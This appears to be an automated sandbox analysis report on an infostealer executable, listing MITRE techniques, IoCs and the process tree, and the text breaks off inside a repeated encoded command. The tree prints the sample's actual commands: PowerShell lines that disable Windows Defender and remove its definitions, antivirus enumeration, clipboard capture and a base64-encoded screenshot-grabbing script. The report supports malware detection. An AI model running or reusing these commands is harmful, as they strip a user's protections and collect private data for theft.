89ae1787bf8c29a39d15478d2e65b7b11e721e09040d6644ef06aa6b7a20258b

Analysis

max time kernel
93s
max time network
144s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
22-12-2024 20:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

main.exe
Size

7.5MB
MD5

ed396e0891a07137d1149fd63beb9d84
SHA1

a5405cca502fbf7840a88053f5c0d2a6aea287f7
SHA256

89ae1787bf8c29a39d15478d2e65b7b11e721e09040d6644ef06aa6b7a20258b
SHA512

a54525d957c4ab0f1130e9ec834b309db7c4d7a23496296a77825b0c05a95a9a5fad1ee5339bfbe0aa1184cee665c80e08b6d3452f97575eda559f3c85002dd2
SSDEEP

196608:E9hhOmurErvI9pWjg/Qc+4o673pNrabeSyzWtPMYnNcsI:k1urEUWjZZ4dDLIehzWtPTNzI

Score

8^/10

collection credential_access defense_evasion discovery execution spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
348	powershell.exe
3952	powershell.exe
3604	powershell.exe
3536	powershell.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
2180	cmd.exe
752	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
4404	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
924	main.exe
924	main.exe
924	main.exe
924	main.exe
924	main.exe
924	main.exe
924	main.exe
924	main.exe
924	main.exe
924	main.exe
924	main.exe
924	main.exe
924	main.exe
924	main.exe
924	main.exe
924	main.exe
924	main.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
21	discord.com
22	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
18	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 3 IoCs

discovery

Process Discovery

T1057

pid	Process
5060	tasklist.exe
3836	tasklist.exe
1032	tasklist.exe

UPX packed file 56 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023ca9-21.dat	upx
behavioral2/memory/924-25-0x00007FFB33C10000-0x00007FFB342D5000-memory.dmp	upx
behavioral2/files/0x0007000000023c9c-27.dat	upx
behavioral2/files/0x0007000000023ca7-29.dat	upx
behavioral2/files/0x0007000000023ca3-47.dat	upx
behavioral2/files/0x0007000000023ca2-46.dat	upx
behavioral2/files/0x0007000000023ca1-45.dat	upx
behavioral2/files/0x0007000000023ca0-44.dat	upx
behavioral2/files/0x0007000000023c9f-43.dat	upx
behavioral2/files/0x0007000000023c9e-42.dat	upx
behavioral2/files/0x0007000000023c9d-41.dat	upx
behavioral2/files/0x0007000000023c9b-40.dat	upx
behavioral2/files/0x0007000000023cae-39.dat	upx
behavioral2/files/0x0007000000023cad-38.dat	upx
behavioral2/files/0x0007000000023cac-37.dat	upx
behavioral2/files/0x0007000000023ca8-34.dat	upx
behavioral2/files/0x0007000000023ca6-33.dat	upx
behavioral2/memory/924-48-0x00007FFB4C020000-0x00007FFB4C02F000-memory.dmp	upx
behavioral2/memory/924-30-0x00007FFB46900000-0x00007FFB46925000-memory.dmp	upx
behavioral2/memory/924-54-0x00007FFB43350000-0x00007FFB4337D000-memory.dmp	upx
behavioral2/memory/924-56-0x00007FFB49190000-0x00007FFB491AA000-memory.dmp	upx
behavioral2/memory/924-58-0x00007FFB43320000-0x00007FFB43344000-memory.dmp	upx
behavioral2/memory/924-60-0x00007FFB42820000-0x00007FFB4299F000-memory.dmp	upx
behavioral2/memory/924-62-0x00007FFB48F90000-0x00007FFB48FA9000-memory.dmp	upx
behavioral2/memory/924-64-0x00007FFB470E0000-0x00007FFB470ED000-memory.dmp	upx
behavioral2/memory/924-66-0x00007FFB432E0000-0x00007FFB43313000-memory.dmp	upx
behavioral2/memory/924-71-0x00007FFB42F60000-0x00007FFB4302D000-memory.dmp	upx
behavioral2/memory/924-74-0x00007FFB46900000-0x00007FFB46925000-memory.dmp	upx
behavioral2/memory/924-73-0x00007FFB336E0000-0x00007FFB33C09000-memory.dmp	upx
behavioral2/memory/924-70-0x00007FFB33C10000-0x00007FFB342D5000-memory.dmp	upx
behavioral2/memory/924-79-0x00007FFB46E50000-0x00007FFB46E5D000-memory.dmp	upx
behavioral2/memory/924-81-0x00007FFB42A90000-0x00007FFB42BAA000-memory.dmp	upx
behavioral2/memory/924-78-0x00007FFB43350000-0x00007FFB4337D000-memory.dmp	upx
behavioral2/memory/924-76-0x00007FFB46A20000-0x00007FFB46A34000-memory.dmp	upx
behavioral2/memory/924-104-0x00007FFB43320000-0x00007FFB43344000-memory.dmp	upx
behavioral2/memory/924-161-0x00007FFB42820000-0x00007FFB4299F000-memory.dmp	upx
behavioral2/memory/924-195-0x00007FFB48F90000-0x00007FFB48FA9000-memory.dmp	upx
behavioral2/memory/924-197-0x00007FFB470E0000-0x00007FFB470ED000-memory.dmp	upx
behavioral2/memory/924-213-0x00007FFB432E0000-0x00007FFB43313000-memory.dmp	upx
behavioral2/memory/924-225-0x00007FFB42F60000-0x00007FFB4302D000-memory.dmp	upx
behavioral2/memory/924-238-0x00007FFB336E0000-0x00007FFB33C09000-memory.dmp	upx
behavioral2/memory/924-239-0x00007FFB33C10000-0x00007FFB342D5000-memory.dmp	upx
behavioral2/memory/924-253-0x00007FFB42A90000-0x00007FFB42BAA000-memory.dmp	upx
behavioral2/memory/924-264-0x00007FFB42F60000-0x00007FFB4302D000-memory.dmp	upx
behavioral2/memory/924-263-0x00007FFB432E0000-0x00007FFB43313000-memory.dmp	upx
behavioral2/memory/924-262-0x00007FFB470E0000-0x00007FFB470ED000-memory.dmp	upx
behavioral2/memory/924-261-0x00007FFB48F90000-0x00007FFB48FA9000-memory.dmp	upx
behavioral2/memory/924-260-0x00007FFB42820000-0x00007FFB4299F000-memory.dmp	upx
behavioral2/memory/924-259-0x00007FFB43320000-0x00007FFB43344000-memory.dmp	upx
behavioral2/memory/924-258-0x00007FFB49190000-0x00007FFB491AA000-memory.dmp	upx
behavioral2/memory/924-257-0x00007FFB43350000-0x00007FFB4337D000-memory.dmp	upx
behavioral2/memory/924-256-0x00007FFB4C020000-0x00007FFB4C02F000-memory.dmp	upx
behavioral2/memory/924-255-0x00007FFB46900000-0x00007FFB46925000-memory.dmp	upx
behavioral2/memory/924-254-0x00007FFB336E0000-0x00007FFB33C09000-memory.dmp	upx
behavioral2/memory/924-252-0x00007FFB46E50000-0x00007FFB46E5D000-memory.dmp	upx
behavioral2/memory/924-251-0x00007FFB46A20000-0x00007FFB46A34000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
5020	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4688	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 18 IoCs

pid	Process
348	powershell.exe
3952	powershell.exe
3952	powershell.exe
348	powershell.exe
752	powershell.exe
752	powershell.exe
4856	powershell.exe
4856	powershell.exe
752	powershell.exe
4856	powershell.exe
3604	powershell.exe
3604	powershell.exe
4288	powershell.exe
4288	powershell.exe
3536	powershell.exe
3536	powershell.exe
4848	powershell.exe
4848	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	348	powershell.exe
Token: SeDebugPrivilege	3952	powershell.exe
Token: SeDebugPrivilege	3836	tasklist.exe
Token: SeDebugPrivilege	5060	tasklist.exe
Token: SeDebugPrivilege	752	powershell.exe
Token: SeDebugPrivilege	1032	tasklist.exe
Token: SeIncreaseQuotaPrivilege	4232	WMIC.exe
Token: SeSecurityPrivilege	4232	WMIC.exe
Token: SeTakeOwnershipPrivilege	4232	WMIC.exe
Token: SeLoadDriverPrivilege	4232	WMIC.exe
Token: SeSystemProfilePrivilege	4232	WMIC.exe
Token: SeSystemtimePrivilege	4232	WMIC.exe
Token: SeProfSingleProcessPrivilege	4232	WMIC.exe
Token: SeIncBasePriorityPrivilege	4232	WMIC.exe
Token: SeCreatePagefilePrivilege	4232	WMIC.exe
Token: SeBackupPrivilege	4232	WMIC.exe
Token: SeRestorePrivilege	4232	WMIC.exe
Token: SeShutdownPrivilege	4232	WMIC.exe
Token: SeDebugPrivilege	4232	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4232	WMIC.exe
Token: SeRemoteShutdownPrivilege	4232	WMIC.exe
Token: SeUndockPrivilege	4232	WMIC.exe
Token: SeManageVolumePrivilege	4232	WMIC.exe
Token: 33	4232	WMIC.exe
Token: 34	4232	WMIC.exe
Token: 35	4232	WMIC.exe
Token: 36	4232	WMIC.exe
Token: SeDebugPrivilege	4856	powershell.exe
Token: SeIncreaseQuotaPrivilege	4232	WMIC.exe
Token: SeSecurityPrivilege	4232	WMIC.exe
Token: SeTakeOwnershipPrivilege	4232	WMIC.exe
Token: SeLoadDriverPrivilege	4232	WMIC.exe
Token: SeSystemProfilePrivilege	4232	WMIC.exe
Token: SeSystemtimePrivilege	4232	WMIC.exe
Token: SeProfSingleProcessPrivilege	4232	WMIC.exe
Token: SeIncBasePriorityPrivilege	4232	WMIC.exe
Token: SeCreatePagefilePrivilege	4232	WMIC.exe
Token: SeBackupPrivilege	4232	WMIC.exe
Token: SeRestorePrivilege	4232	WMIC.exe
Token: SeShutdownPrivilege	4232	WMIC.exe
Token: SeDebugPrivilege	4232	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4232	WMIC.exe
Token: SeRemoteShutdownPrivilege	4232	WMIC.exe
Token: SeUndockPrivilege	4232	WMIC.exe
Token: SeManageVolumePrivilege	4232	WMIC.exe
Token: 33	4232	WMIC.exe
Token: 34	4232	WMIC.exe
Token: 35	4232	WMIC.exe
Token: 36	4232	WMIC.exe
Token: SeDebugPrivilege	3604	powershell.exe
Token: SeDebugPrivilege	4288	powershell.exe
Token: SeIncreaseQuotaPrivilege	3492	WMIC.exe
Token: SeSecurityPrivilege	3492	WMIC.exe
Token: SeTakeOwnershipPrivilege	3492	WMIC.exe
Token: SeLoadDriverPrivilege	3492	WMIC.exe
Token: SeSystemProfilePrivilege	3492	WMIC.exe
Token: SeSystemtimePrivilege	3492	WMIC.exe
Token: SeProfSingleProcessPrivilege	3492	WMIC.exe
Token: SeIncBasePriorityPrivilege	3492	WMIC.exe
Token: SeCreatePagefilePrivilege	3492	WMIC.exe
Token: SeBackupPrivilege	3492	WMIC.exe
Token: SeRestorePrivilege	3492	WMIC.exe
Token: SeShutdownPrivilege	3492	WMIC.exe
Token: SeDebugPrivilege	3492	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3572 wrote to memory of 924	3572	main.exe	82
PID 3572 wrote to memory of 924	3572	main.exe	82
PID 924 wrote to memory of 2376	924	main.exe	83
PID 924 wrote to memory of 2376	924	main.exe	83
PID 924 wrote to memory of 2428	924	main.exe	84
PID 924 wrote to memory of 2428	924	main.exe	84
PID 2376 wrote to memory of 348	2376	cmd.exe	87
PID 2376 wrote to memory of 348	2376	cmd.exe	87
PID 2428 wrote to memory of 3952	2428	cmd.exe	88
PID 2428 wrote to memory of 3952	2428	cmd.exe	88
PID 924 wrote to memory of 1100	924	main.exe	89
PID 924 wrote to memory of 1100	924	main.exe	89
PID 924 wrote to memory of 1140	924	main.exe	90
PID 924 wrote to memory of 1140	924	main.exe	90
PID 1140 wrote to memory of 3836	1140	cmd.exe	93
PID 1140 wrote to memory of 3836	1140	cmd.exe	93
PID 1100 wrote to memory of 5060	1100	cmd.exe	94
PID 1100 wrote to memory of 5060	1100	cmd.exe	94
PID 924 wrote to memory of 2412	924	main.exe	95
PID 924 wrote to memory of 2412	924	main.exe	95
PID 924 wrote to memory of 2180	924	main.exe	96
PID 924 wrote to memory of 2180	924	main.exe	96
PID 924 wrote to memory of 3872	924	main.exe	97
PID 924 wrote to memory of 3872	924	main.exe	97
PID 924 wrote to memory of 1244	924	main.exe	98
PID 924 wrote to memory of 1244	924	main.exe	98
PID 924 wrote to memory of 3628	924	main.exe	102
PID 924 wrote to memory of 3628	924	main.exe	102
PID 924 wrote to memory of 1904	924	main.exe	106
PID 924 wrote to memory of 1904	924	main.exe	106
PID 2180 wrote to memory of 752	2180	cmd.exe	108
PID 2180 wrote to memory of 752	2180	cmd.exe	108
PID 3872 wrote to memory of 1032	3872	cmd.exe	109
PID 3872 wrote to memory of 1032	3872	cmd.exe	109
PID 1244 wrote to memory of 4300	1244	cmd.exe	110
PID 1244 wrote to memory of 4300	1244	cmd.exe	110
PID 1904 wrote to memory of 4856	1904	cmd.exe	111
PID 1904 wrote to memory of 4856	1904	cmd.exe	111
PID 2412 wrote to memory of 4232	2412	cmd.exe	112
PID 2412 wrote to memory of 4232	2412	cmd.exe	112
PID 3628 wrote to memory of 4688	3628	cmd.exe	113
PID 3628 wrote to memory of 4688	3628	cmd.exe	113
PID 924 wrote to memory of 1160	924	main.exe	114
PID 924 wrote to memory of 1160	924	main.exe	114
PID 1160 wrote to memory of 4020	1160	cmd.exe	116
PID 1160 wrote to memory of 4020	1160	cmd.exe	116
PID 924 wrote to memory of 3064	924	main.exe	117
PID 924 wrote to memory of 3064	924	main.exe	117
PID 4856 wrote to memory of 3544	4856	powershell.exe	119
PID 4856 wrote to memory of 3544	4856	powershell.exe	119
PID 3064 wrote to memory of 4456	3064	cmd.exe	120
PID 3064 wrote to memory of 4456	3064	cmd.exe	120
PID 924 wrote to memory of 4376	924	main.exe	121
PID 924 wrote to memory of 4376	924	main.exe	121
PID 4376 wrote to memory of 3476	4376	cmd.exe	123
PID 4376 wrote to memory of 3476	4376	cmd.exe	123
PID 924 wrote to memory of 4936	924	main.exe	124
PID 924 wrote to memory of 4936	924	main.exe	124
PID 4936 wrote to memory of 5116	4936	cmd.exe	126
PID 4936 wrote to memory of 5116	4936	cmd.exe	126
PID 3544 wrote to memory of 1920	3544	csc.exe	127
PID 3544 wrote to memory of 1920	3544	csc.exe	127
PID 924 wrote to memory of 3232	924	main.exe	128
PID 924 wrote to memory of 3232	924	main.exe	128

C:\Users\Admin\AppData\Local\Temp\main.exe
"C:\Users\Admin\AppData\Local\Temp\main.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3572
- C:\Users\Admin\AppData\Local\Temp\main.exe
  "C:\Users\Admin\AppData\Local\Temp\main.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:924
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\main.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2376
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\main.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:348
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2428
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1100
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:5060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1140
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3836
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2412
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4232
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:2180
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:752
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3872
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1244
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4300
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3628
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:4688
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1904
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkAL